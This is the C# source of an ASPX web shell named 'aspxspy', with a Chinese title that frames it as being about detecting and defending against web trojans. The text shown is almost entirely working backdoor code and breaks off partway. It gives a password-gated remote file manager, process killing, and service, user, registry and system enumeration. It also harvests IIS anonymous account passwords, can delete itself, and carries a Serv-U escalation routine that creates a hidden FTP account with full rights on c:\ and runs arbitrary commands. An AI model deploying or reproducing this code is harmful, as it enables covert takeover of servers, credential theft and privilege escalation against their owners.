aspx超强木马查杀与防范(web网马)
<%@ page language="c#" debug="true" trace="false" validaterequest="false" enableviewstatemac="false" enableviewstate="true"%>
<%@ import namespace="system.io"%>
<%@ import namespace="system.diagnostics"%>
<%@ import namespace="system.data"%>
<%@ import namespace="system.management"%>
<%@ import namespace="system.data.oledb"%>
<%@ import namespace="microsoft.win32"%>
<%@ import namespace="system.net.sockets" %>
<%@ import namespace="system.net" %>
<%@ import namespace="system.runtime.interopservices"%>
<%@ import namespace="system.directoryservices"%>
<%@ import namespace="system.serviceprocess"%>
<%@ import namespace="system.text.regularexpressions"%>
<%@ import namespace="system.threading"%>
<%@ import namespace="system.data.sqlclient"%>
<%@ import namespace="microsoft.visualbasic"%>
<%@ assembly name="system.directoryservices,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="system.management,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="system.serviceprocess,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="microsoft.visualbasic,version=7.0.3300.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<script runat="server">
public string password="21232f297a57a5a743894a0e4a801fc3";//admin
public string vbhln="aspxspy";
public int tdggu=1;
protected oledbconnection dtdr=new oledbconnection();
protected oledbcommand kkvb=new oledbcommand();
public networkstream ns=null;
public networkstream ns1=null;
tcpclient tcp=new tcpclient();
tcpclient zvxm=new tcpclient();
arraylist ivc=new arraylist();
protected void page_load(object sender,eventargs e)
{
yfcnp(this);
fhaen();
if (!pdo())
{
return;
}
if(ispostback)
{
string tki=request["__eventtarget"];
string vqv=request["__file"];
if(tki!="")
{
switch(tki)
{
case "bin_parent":
krir(ebgw(vqv));
break;
case "bin_listdir":
krir(ebgw(vqv));
break;
case "krxgt":
krxgt(ebgw(vqv));
break;
case "bin_createfile":
glkc(vqv);
break;
case "bin_editfile":
glkc(vqv);
break;
case "bin_createdir":
stnpw(vqv);
break;
case "cyal":
cyal(vqv);
break;
case "ksgr":
ksgr(ebgw(vqv));
break;
case "sjv":
sjv(vqv);
break;
case "bin_regread":
tprq(ebgw(vqv));
break;
case "hae":
hae();
break;
case "urjg":
urjg(vqv);
break;
}
if(tki.startswith("dajtd"))
{
dajtd(ebgw(tki.replace("dajtd","")),vqv);
}
else if(tki.startswith("tlvz"))
{
tlvz(ebgw(tki.replace("tlvz","")),vqv);
}
else if(tki.startswith("bin_cfile"))
{
ybyn(ebgw(tki.replace("bin_cfile","")),vqv);
}
}
}
else
{
pbzw();
}
}
public bool pdo()
{
if(request.cookies[vbhln]==null)
{
tzsx();
return false;
}
else
{
if (request.cookies[vbhln].value != password)
{
tzsx();
return false;
}
else
{
return true;
}
}
}
public void tzsx()
{
ljtzc.visible=true;
zvs.visible=false;
}
protected void ykpi(object sender,eventargs e)
{
session.abandon();
response.cookies.add(new httpcookie(vbhln,null));
tzsx();
}
public void pbzw()
{
zvs.visible=true;
ljtzc.visible=false;
bin_button_createfile.attributes["onclick"]="var filename=prompt('please input the file name:','');if(filename){bin_postback('bin_createfile',filename);}";
bin_button_createdir.attributes["onclick"]="var filename=prompt('please input the directory name:','');if(filename){bin_postback('bin_createdir',filename);}";
bin_button_killme.attributes["onclick"]="if(confirm('确定要自杀?')){bin_postback('hae','');};";
bin_span_sname.innerhtml=request.servervariables["local_addr"]+":"+request.servervariables["server_port"]+"("+request.servervariables["server_name"]+")";
bin_span_frameversion.innerhtml="framework ver : "+environment.version.tostring();
if (axsbb.value==string.empty)
{
axsbb.value=oelm(server.mappath("."));
}
bin_h2_title.innertext="文件(夹)管理 >>";
krir(axsbb.value);
}
public void fhaen()
{
try
{
string[] yrgt=directory.getlogicaldrives();
for(int i=0;i<yrgt.length;i++)
{
control c=parsecontrol(" <asp:linkbutton text='"+mfvj(yrgt[i])+"' id=\"bin_button_driv"+i+"\" runat='server' commandargument= '"+yrgt[i]+"'/> | ");
bin_span_drv.controls.add(c);
linkbutton nxedr=(linkbutton)page.findcontrol("bin_button_driv"+i);
nxedr.command+=new commandeventhandler(this.ivk);
}
}catch(exception ex){}
}
public string oelm(string path)
{
if(path.substring(path.length-1,1)!=@"\")
{
path=path+@"\";
}
return path;
}
public string nrrx(string path)
{
char[] trim={'\\'};
if(path.substring(path.length-1,1)==@"\")
{
path=path.trimend(trim);
}
return path;
}
[dllimport("kernel32.dll",entrypoint="getdrivetypea")]
public static extern int omzp(string ndrive);
public string mfvj(string instr)
{
string euxd=string.empty;
int num=omzp(instr);
switch(num)
{
case 1:
euxd="unknow("+instr+")";
break;
case 2:
euxd="removable("+instr+")";
break;
case 3:
euxd="磁盘("+instr+")";
break;
case 4:
euxd="network("+instr+")";
break;
case 5:
euxd="cdrom("+instr+")";
break;
case 6:
euxd="ram disk("+instr+")";
break;
}
return euxd.replace(@"\","");
}
public string mvvj(string instr)
{
byte[] tmp=encoding.default.getbytes(instr);
return convert.tobase64string(tmp);
}
public string ebgw(string instr)
{
byte[] tmp=convert.frombase64string(instr);
return encoding.default.getstring(tmp);
}
public void krir(string path)
{
wicxe();
czfo.visible=true;
bin_h2_title.innertext="文件(夹)管理 >>";
axsbb.value=oelm(path);
directoryinfo gqmm=new directoryinfo(path);
if(directory.getparent(nrrx(path))!=null)
{
string bg=okm();
tablerow p=new tablerow();
for(int i=1;i<6;i++)
{
tablecell pc=new tablecell();
if(i==1)
{
pc.width=unit.parse("2%");
pc.text="<font face='wingdings' size='4'>0</font>";
p.cssclass=bg;
}
if(i==2)
{
pc.text="<a href=\"javascript:bin_postback('bin_parent','"+mvvj(directory.getparent(nrrx(path)).tostring())+"')\">parent directory</a>";
}
p.cells.add(pc);
ugzp.rows.add(p);
}
}
try
{
int vllh=0;
foreach(directoryinfo bin_folder in gqmm.getdirectories())
{
string bg=okm();
vllh++;
tablerow tr=new tablerow();
tablecell tc=new tablecell();
tc.width=unit.parse("2%");
tc.text="<font face='wingdings' size='4'>0</font>";
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.cells.add(tc);
tablecell hczyn=new tablecell();
hczyn.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(axsbb.value+bin_folder.name)+"')\">"+bin_folder.name+"</a>";
tr.cells.add(hczyn);
tablecell lyzk=new tablecell();
lyzk.text=bin_folder.lastwritetimeutc.tostring("yyyy-mm-dd hh:mm:ss");
tr.cells.add(lyzk);
ugzp.rows.add(tr);
tablecell erul=new tablecell();
erul.text="--";
tr.cells.add(erul);
ugzp.rows.add(tr);
tablecell zgkh=new tablecell();
zgkh.text="<a href=\"javascript:if(confirm('确定要删除此文件(夹) ?')){bin_postback('krxgt','"+mvvj(axsbb.value+bin_folder.name)+"')};\">删除</a> | <a href='#' onclick=\"var filename=prompt('请输入文件夹名称:','"+axsbb.value.replace(@"\",@"\\")+bin_folder.name.replace("'","\\'")+"');if(filename){bin_postback('dajtd"+mvvj(axsbb.value+bin_folder.name)+"',filename);} \">重命名</a>";
tr.cells.add(zgkh);
ugzp.rows.add(tr);
}
tablerow ckva=new tablerow();
ckva.attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
ckva.attributes["bgcolor"]="#dddddd";
tablecell jlmw=new tablecell();
jlmw.attributes["colspan"]="6" ;
jlmw.attributes["height"]="5";
ckva.cells.add(jlmw);
ugzp.rows.add(ckva);
int ayrwo=0;
foreach(fileinfo bin_files in gqmm.getfiles())
{
ayrwo++;
string gb=okm();
tablerow tr=new tablerow();
tablecell tc=new tablecell();
tc.width=unit.parse("2%");
tc.text="<input type=\"checkbox\" value=\"0\" name=\""+mvvj(bin_files.name)+"\">";
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=gb;
tr.attributes["onmouseout"]="this.classname='"+gb+"';";
tr.cells.add(tc);
tablecell filename=new tablecell();
if(bin_files.fullname.startswith(request.physicalapplicationpath))
{
string url=request.url.tostring();
filename.text="<a href=\""+bin_files.fullname.replace(request.physicalapplicationpath,url.substring(0,url.indexof('/',8)+1)).replace("\\","/")+"\" target=\"_blank\">"+bin_files.name+"</a>";
}
else
{
filename.text=bin_files.name;
}
tablecell albt=new tablecell();
albt.text=bin_files.lastwritetimeutc.tostring("yyyy-mm-dd hh:mm:ss");
tablecell yzk=new tablecell();
yzk.text=mtg(bin_files.length);
tablecell glpi=new tablecell();
glpi.text="<a href=\"#\" onclick=\"bin_postback('ksgr','"+mvvj(axsbb.value+bin_files.name)+"')\">下载</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+axsbb.value.replace(@"\",@"\\")+bin_files.name.replace("'","\\'")+"');if(filename){bin_postback('bin_cfile"+mvvj(axsbb.value+bin_files.name)+"',filename);} \">复制</a> | <a href=\"#\" onclick=\"bin_postback('bin_editfile','"+bin_files.name+"')\">编辑</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+axsbb.value.replace(@"\",@"\\")+bin_files.name.replace("'","\\'")+"');if(filename){bin_postback('tlvz"+mvvj(axsbb.value+bin_files.name)+"',filename);} \">重命名</a> | <a href=\"#\" onclick=\"bin_postback('cyal','"+bin_files.name+"')\">修改文件属性</a> ";
tr.cells.add(filename);
tr.cells.add(albt);
tr.cells.add(yzk);
tr.cells.add(glpi);
ugzp.rows.add(tr);
}
string lgb=okm();
tablerow owam=new tablerow();
owam.cssclass=lgb;
for(int i=1;i<4;i++)
{
tablecell lgv=new tablecell();
if(i==1)
{
lgv.text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getelementsbytagname('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
}
if(i==2)
{
lgv.text="<a href=\"#\" onclick=\"var d_file='';var ck=document.getelementsbytagname('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('are you sure delete the files ?')){bin_postback('sjv',d_file)};}\">delete selected</a>";
}
if(i==3)
{
lgv.columnspan=4;
lgv.style.add("text-align","right");
lgv.text=vllh+" 文件夹/ "+ayrwo+" 文件";
}
owam.cells.add(lgv);
}
ugzp.rows.add(owam);
}
catch(exception error)
{
xseub(error.message);
}
}
public string okm()
{
tdggu++;
if(tdggu % 2==0)
{
return "alt1";
}
else
{
return "alt2";
}
}
public void krxgt(string qcku)
{
try
{
directory.delete(qcku,true);
xseub("directory delete new success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(directory.getparent(qcku).tostring());
}
public void dajtd(string sdir,string ddir)
{
try
{
directory.move(sdir,ddir);
xseub("directory renamed success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
public void tlvz(string sfile,string dfile)
{
try
{
file.move(sfile,dfile);
xseub("file renamed success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
public void ybyn(string spath,string dpath)
{
try
{
file.copy(spath,dpath);
xseub("file copy success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
public void stnpw(string path)
{
try
{
directory.createdirectory(axsbb.value+path);
xseub("directory created success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
public void glkc(string path)
{
if(request["__eventtarget"]=="bin_editfile" || request["__eventtarget"]=="bin_createfile")
{
foreach(listitem item in ndcx.items)
{
if(item.selected=true)
{
item.selected=false;
}
}
}
bin_h2_title.innerhtml="创建/编辑文件 >>";
wicxe();
vrfa.visible=true;
if(path.indexof(":")< 0)
{
sqon.value=axsbb.value+path;
}
else
{
sqon.value=path;
}
if(file.exists(sqon.value))
{
streamreader sr;
if(ndcx.selecteditem.text=="utf-8")
{
sr=new streamreader(sqon.value,encoding.utf8);
}
else
{
sr=new streamreader(sqon.value,encoding.default);
}
xgvv.innertext=sr.readtoend();
sr.close();
}
else
{
xgvv.innertext=string.empty;
}
}
public void ksgr(string path)
{
fileinfo fs=new fileinfo(path);
response.clear();
page.response.clearheaders();
page.response.buffer=false;
this.enableviewstate=false;
response.addheader("content-disposition","attachment;filename="+httputility.urlencode(fs.name,system.text.encoding.utf8));
response.addheader("content-length",fs.length.tostring());
page.response.contenttype="application/unknown";
response.writefile(fs.fullname);
page.response.flush();
page.response.close();
response.end();
page.response.clear();
}
public void sjv(string path)
{
try
{
string[] spdt=path.split(',');
for(int i=0;i<spdt.length-1;i++)
{
file.delete(axsbb.value+ebgw(spdt[i]));
}
xseub("file delete success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
public void hae()
{
try
{
file.delete(request.physicalpath);
}
catch(exception error)
{
xseub(error.message);
}
}
public void cyal(string path)
{
bin_h2_title.innerhtml="克隆文件的最后修改时间 >>";
wicxe();
zryg.visible=true;
qifb.value=axsbb.value+path;
licp.value=axsbb.value;
pwvl.value=axsbb.value+path;
string att=file.getattributes(qifb.value).tostring();
if(att.lastindexof("readonly")!=-1)
{
zhwsk.checked=true;
}
if(att.lastindexof("system")!=-1)
{
ssr.checked=true;
}
if(att.lastindexof("hidden")!=-1)
{
ccb.checked=true;
}
if(att.lastindexof("archive")!=-1)
{
fbyz.checked=true;
}
yuqx.value=file.getcreationtimeutc(pwvl.value).tostring();
uyjw.value=file.getlastwritetimeutc(pwvl.value).tostring();
alsn.value=file.getlastaccesstimeutc(pwvl.value).tostring();
}
public static string mtg(int64 filesize)
{
if(filesize<0)
{
throw new argumentoutofrangeexception("filesize");
}
else if(filesize >= 1024 * 1024 * 1024)
{
return string.format("{0:########0.00} g",((double)filesize)/(1024 * 1024 * 1024));
}
else if(filesize >= 1024 * 1024)
{
return string.format("{0:####0.00} m",((double)filesize)/(1024 * 1024));
}
else if(filesize >= 1024)
{
return string.format("{0:####0.00} k",((double)filesize)/ 1024);
}
else
{
return string.format("{0} b",filesize);
}
}
private bool sgde(string ssrc)
{
regex reg=new regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.ismatch(ssrc))
{
return true;
}
else
{
return false;
}
}
public void adcx()
{
string qcku=string.empty;
string mwgem="iis://localhost/w3svc";
gli.style.add("word-break","break-all");
try
{
directoryentry hhzcy=new directoryentry(mwgem);
int fmw=0;
foreach(directoryentry child in hhzcy.children)
{
if(sgde(child.name.tostring()))
{
fmw++;
directoryentry newdir=new directoryentry(mwgem+"/"+child.name.tostring());
directoryentry hlyu=newdir.children.find("root","iiswebvirtualdir");
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.attributes["title"]="site:"+child.properties["servercomment"].value.tostring();
for(int i=1;i<6;i++)
{
try
{
tablecell tfit=new tablecell();
switch(i)
{case 1:
tfit.text=fmw.tostring();
break;
case 2:
tfit.text=hlyu.properties["anonymoususername"].value.tostring();
break;
case 3:
tfit.text=hlyu.properties["anonymoususerpass"].value.tostring();
break;
case 4:
stringbuilder sb=new stringbuilder();
propertyvaluecollection pc=child.properties["serverbindings"];
for (int j=0; j < pc.count; j++)
{
sb.append(pc[j].tostring()+"<br>");
}
tfit.text=sb.tostring().substring(0,sb.tostring().length-4);
break;
case 5:
tfit.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(hlyu.properties["path"].value.tostring())+"')\">"+hlyu.properties["path"].value.tostring()+"</a>";
break;
}
tr.cells.add(tfit);
}
catch (exception ex)
{
xseub(ex.message);
continue;
}
}
gli.controls.add(tr);
}
}
}
catch(exception ex)
{
xseub(ex.message);
}
}
public managementobjectcollection phqtd(string query)
{
managementobjectsearcher qs=new managementobjectsearcher(new selectquery(query));
return qs.get();
}
public datatable ccf(string query)
{
datatable dt=new datatable();
int i=0;
managementobjectsearcher qs=new managementobjectsearcher(new selectquery(query));
try
{
foreach(managementobject m in qs.get())
{
datarow dr=dt.newrow();
propertydatacollection.propertydataenumerator oenum;
oenum=(m.properties.getenumerator()as propertydatacollection.propertydataenumerator);
while(oenum.movenext())
{
propertydata dru=(propertydata)oenum.current;
if(dt.columns.indexof(dru.name)==-1)
{
dt.columns.add(dru.name);
dt.columns[dt.columns.count-1].defaultvalue="";
}
if(m[dru.name]!=null)
{
dr[dru.name]=m[dru.name].tostring();
}
else
{
dr[dru.name]=string.empty;
}
}
dt.rows.add(dr);
}
}
catch(exception error)
{
}
return dt;
}
public void yuw()
{
try
{
bin_h2_title.innertext="系统进程 >>";
wicxe();
dcbs.visible=true;
int uebti=0;
process[] p=process.getprocesses();
foreach(process sp in p)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=sp.id.tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=sp.processname.tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=sp.threads.count.tostring();
tr.controls.add(td);
}
if(i==5)
{
td.text=sp.basepriority.tostring();
tr.controls.add(td);
}
if(i==6)
{
td.text="--";
tr.controls.add(td);
}
}
ijsl.controls.add(tr);
}
}
catch(exception error)
{
aiz();
}
aiz();
}
public void aiz()
{
try
{
bin_h2_title.innertext="系统进程 >>";
wicxe();
dcbs.visible=true;
int uebti=0;
datatable dt=ccf("win32_process");
for(int j=0;j<dt.rows.count;j++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=dt.rows[j]["processid"].tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=dt.rows[j]["name"].tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=dt.rows[j]["threadcount"].tostring();
tr.controls.add(td);
}
if(i==5)
{
td.text=dt.rows[j]["priority"].tostring();
tr.controls.add(td);
}
if(i==6)
{
if( dt.rows[j]["commandline"]!=string.empty)
{
td.text="<a href=\"javascript:bin_postback('urjg','"+dt.rows[j]["processid"].tostring()+"')\">kill</a>";
}
else
{
td.text="--";
}
tr.controls.add(td);
}
}
ijsl.controls.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
public void urjg(string pid)
{
try
{
foreach(managementobject p in phqtd("select * from win32_process where processid ='"+pid+"'"))
{
p.invokemethod("terminate",null);
p.dispose();
}
xseub("process kill success !");
}
catch(exception error)
{
xseub(error.message);
}
aiz();
}
public void ohpf()
{
try
{
bin_h2_title.innertext="系统服务 >>";
wicxe();
iqxm.visible=true;
int uebti=0;
servicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();
for(int i=0;i<kqmru.length;i++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int b=1;b<7;b++)
{
tablecell td=new tablecell();
if(b==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(b==2)
{
td.text="null";
tr.controls.add(td);
}
if(b==3)
{
td.text=kqmru[i].servicename.tostring();
tr.controls.add(td);
}
if(b==4)
{
td.text="";
tr.controls.add(td);
}
if(b==5)
{
string koio=kqmru[i].status.tostring();
if(koio=="running")
{
td.text="<font color=green>"+koio+"</font>";
}
else
{
td.text="<font color=red>"+koio+"</font>";
}
tr.controls.add(td);
}
if(b==6)
{
td.text="";
tr.controls.add(td);
}
}
vhcs.controls.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
public void tzrh()
{
try
{
bin_h2_title.innertext="系统服务 >>";
wicxe();
iqxm.visible=true;
int uebti=0;
datatable dt=ccf("win32_service");
for(int j=0;j<dt.rows.count;j++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.attributes["title"]=dt.rows[j]["description"].tostring();
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=dt.rows[j]["processid"].tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=dt.rows[j]["name"].tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=dt.rows[j]["pathname"].tostring();
tr.controls.add(td);
}
if(i==5)
{
string koio=dt.rows[j]["state"].tostring();
if(koio=="running")
{
td.text="<font color=green>"+koio+"</font>";
}
else
{
td.text="<font color=red>"+koio+"</font>";
}
tr.controls.add(td);
}
if(i==6)
{
td.text=dt.rows[j]["startmode"].tostring();
tr.controls.add(td);
}
}
vhcs.controls.add(tr);
}
}
catch(exception error)
{
ohpf();
}
}
public void pld()
{
try
{
wicxe();
xwvq.visible=true;
bin_h2_title.innertext="用户(组)信息 >>";
directoryentry twq=new directoryentry("winnt://"+environment.machinename.tostring());
foreach(directoryentry child in twq.children)
{
foreach(string name in child.properties.propertynames)
{
propertyvaluecollection pvc=child.properties[name];
int c=pvc.count;
for(int i=0;i<c;i++)
{
if(name!="objectsid" && name!="parameters" && name!="loginhours")
{
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tablecell td=new tablecell();
td.text=name;
tr.controls.add(td);
tablecell td1=new tablecell();
td1.text=pvc[i].tostring();
tr.controls.add(td1);
vpa.controls.add(tr);
}
}
}
tablerow trn=new tablerow();
for(int x=1;x<3;x++)
{
tablecell tdn=new tablecell();
tdn.attributes["style"]="height:2px;background-color:#bbbbbb;";
trn.controls.add(tdn);
vpa.controls.add(trn);
}
}
}
catch(exception error)
{
xseub(error.message);
}
}
public void ilvut()
{
try
{
wicxe();
xwvq.visible=true;
bin_h2_title.innertext="用户(组)信息 >>";
datatable user=ccf("win32_useraccount");
for(int i=0;i<user.rows.count;i++)
{
for(int j=0;j<user.columns.count;j++)
{
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tablecell td=new tablecell();
td.text=user.columns[j].tostring();
tr.controls.add(td);
tablecell td1=new tablecell();
td1.text=user.rows[i][j].tostring();
tr.controls.add(td1);
vpa.controls.add(tr);
}
tablerow trn=new tablerow();
for(int x=1;x<3;x++)
{
tablecell tdn=new tablecell();
tdn.attributes["style"]="height:2px;background-color:#bbbbbb;";
trn.controls.add(tdn);
vpa.controls.add(trn);
}
}
}
catch(exception error)
{
pld();
}
}
public void pdvm()
{
try
{
registrykey eez=registry.localmachine.opensubkey(@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp");
string ikjwh=ddmpl(eez,"portnumber");
registrykey izn=registry.localmachine.opensubkey(@"hardware\description\system\centralprocessor");
int cpu=izn.subkeycount;
registrykey mqii=registry.localmachine.opensubkey(@"hardware\description\system\centralprocessor\0\");
string nppz=ddmpl(mqii,"processornamestring");
wicxe();
ghab.visible=true;
bin_h2_title.innertext="系统信息 >>";
bin_h2_mac.innertext="网卡信息 >>";
bin_h2_driver.innertext="驱动信息 >>";
stringbuilder yewc=new stringbuilder();
stringbuilder hwjes=new stringbuilder();
stringbuilder jxkae=new stringbuilder();
yewc.append("<li><u>server domain : </u>"+request.servervariables["server_name"]+"</li>");
yewc.append("<li><u>server ip : </u>"+request.servervariables["local_addr"]+":"+request.servervariables["server_port"]+"</li>");
yewc.append("<li><u>terminal port : </u>"+ikjwh+"</li>");
yewc.append("<li><u>server os : </u>"+environment.osversion+"</li>");
yewc.append("<li><u>server software : </u>"+request.servervariables["server_software"]+"</li>");
yewc.append("<li><u>server username : </u>"+environment.username+"</li>");
yewc.append("<li><u>server time : </u>"+system.datetime.now.tostring()+"</li>");
yewc.append("<li><u>server timezone : </u>"+ccf("win32_timezone").rows[0]["caption"]+"</li>");
datatable bios=ccf("win32_bios");
yewc.append("<li><u>server bios : </u>"+bios.rows[0]["manufacturer"]+" : "+bios.rows[0]["name"]+"</li>");
yewc.append("<li><u>cpu count : </u>"+cpu.tostring()+"</li>");
yewc.append("<li><u>cpu version : </u>"+nppz+"</li>");
datatable upm=ccf("win32_physicalmemory");
int64 oznzv=0;
for(int i=0;i<upm.rows.count;i++)
{
oznzv+=int64.parse(upm.rows[0]["capacity"].tostring());
}
yewc.append("<li><u>server upm : </u>"+mtg(oznzv)+"</li>");
datatable doza=ccf("win32_networkadapterconfiguration");
for(int i=0;i<doza.rows.count;i++)
{
hwjes.append("<li><u>server mac"+i+" : </u>"+doza.rows[i]["caption"]+"</li>");
if(doza.rows[i]["macaddress"]!=string.empty)
{
hwjes.append("<li style=\"list-style:none;\"><u>address : </u>"+doza.rows[i]["macaddress"]+"</li>");
}
}
datatable driver=ccf("win32_systemdriver");
for (int i=0; i<driver.rows.count; i++)
{
jxkae.append("<li><u class='u1'>server driver"+i+" : </u><u class='u2'>"+driver.rows[i]["caption"]+"</u> ");
if (driver.rows[i]["pathname"]!=string.empty)
{
jxkae.append("path : "+driver.rows[i]["pathname"]);
}
else
{
jxkae.append("no path information");
}
jxkae.append("</li>");
}
bin_ul_sys.innerhtml=yewc.tostring();
bin_ul_netconfig.innerhtml=hwjes.tostring();
bin_ul_driver.innerhtml=jxkae.tostring();
}
catch(exception error)
{
xseub(error.message);
}
}
public void adcpk()
{
wicxe();
apl.visible=true;
bin_h2_title.innertext="serv-u 提权 >>";
}
public void ldodr()
{
string jggg=string.empty;
string user=dnohj.value;
string pass=nmd.value;
int port=int32.parse(hlql.value);
string cmd=mhbjb.value;
string crtk="user "+user+"\r\n";
string jnng="pass "+pass+"\r\n";
string site="site maintenance\r\n";
string mtojb="-deletedomain\r\n-ip=0.0.0.0\r\n portno=52521\r\n";
string suti="-setdomain\r\n-domain=bin|0.0.0.0|52521|-1|1|0\r\n-tzoenable=0\r\n tzokey=\r\n";
string ivdt="-setusersetup\r\n-ip=0.0.0.0\r\n-portno=52521\r\n-user=bin\r\n-password=binftp\r\n-homedir=c:\\\r\n-loginmesfile=\r\n-disable=0\r\n-relpaths=1\r\n-needsecure=0\r\n-hidehidden=0\r\n-alwaysallowlogin=0\r\n-changepassword=0\r\n-quotaenable=0\r\n-maxusersloginperip=-1\r\n-speedlimitup=0\r\n-speedlimitdown=0\r\n-maxnrusers=-1\r\n-idletimeout=600\r\n-sessiontimeout=-1\r\n-expire=0\r\n-ratiodown=1\r\n-ratioscredit=0\r\n-quotacurrent=0\r\n-quotamaximum=0\r\n-maintenance=system\r\n-passwordtype=regular\r\n-ratios=nonern\r\n access=c:\\|rwamelcdp\r\n";
string zexn="quit\r\n";
uhla.visible=true;
try
{
tcp.connect("127.0.0.1",port);
tcp.receivebuffersize=1024;
ns=tcp.getstream();
rev(ns);
zjim(ns,crtk);
rev(ns);
zjim(ns,jnng);
rev(ns);
zjim(ns,site);
rev(ns);
zjim(ns,mtojb);
rev(ns);
zjim(ns,suti);
rev(ns);
zjim(ns,ivdt);
rev(ns);
bin_td_res.innerhtml+="<font color=\"green\"><b>exec cmd.................\r\n</b></font>";
zvxm.connect(request.servervariables["local_addr"],52521);
ns1=zvxm.getstream();
rev(ns1);
zjim(ns1,"user bin\r\n");
rev(ns1);
zjim(ns1,"pass binftp\r\n");
rev(ns1);
zjim(ns1,"site exec "+cmd+"\r\n");
rev(ns1);
zjim(ns1,"quit\r\n");
rev(ns1);
zvxm.close();
zjim(ns,mtojb);
rev(ns);
tcp.close();
}
catch(exception error)
{
xseub(error.message);
}
}
protected void rev(networkstream instream)
{
string ftbtf=string.empty;
if(instream.canread)
{
byte[] upz=new byte[1024];
do
{
system.threading.thread.sleep(50);
int len=instream.read(upz,0,upz.length);
ftbtf+=encoding.default.getstring(upz,0,len);
}
while(instream.dataavailable);
}
bin_td_res.innerhtml+="<font color=red>"+ftbtf.replace("\0","")+"</font>";
}
protected void zjim(networkstream instream,string sendstr)
{
if(instream.canwrite)
{
byte[] upz=encoding.default.getbytes(sendstr);
instream.write(upz,0,upz.length);
}
bin_td_res.innerhtml+="<font color=blue>"+sendstr+"</font>";
}
public void xfhz()
{
wicxe();
kkhn.visible=true;
bin_h2_title.innertext="注册表查询 >>";
string txc=@"hkey_local_machine|hkey_classes_root|hkey_current_user|hkey_users|hkey_current_config";
vyx.text="";
foreach(string rootkey in txc.split('|'))
{
vyx.text+="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(rootkey)+"')\">"+rootkey+"</a> | ";
}
lfavw();
}
protected void lfavw()
{
qpdi.text="";
string txc=@"hkey_local_machine|hkey_classes_root|hkey_current_user|hkey_users|hkey_current_config";
tablerow tr;
tablecell tc;
foreach(string rootkey in txc.split('|'))
{
tr=new tablerow();
tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
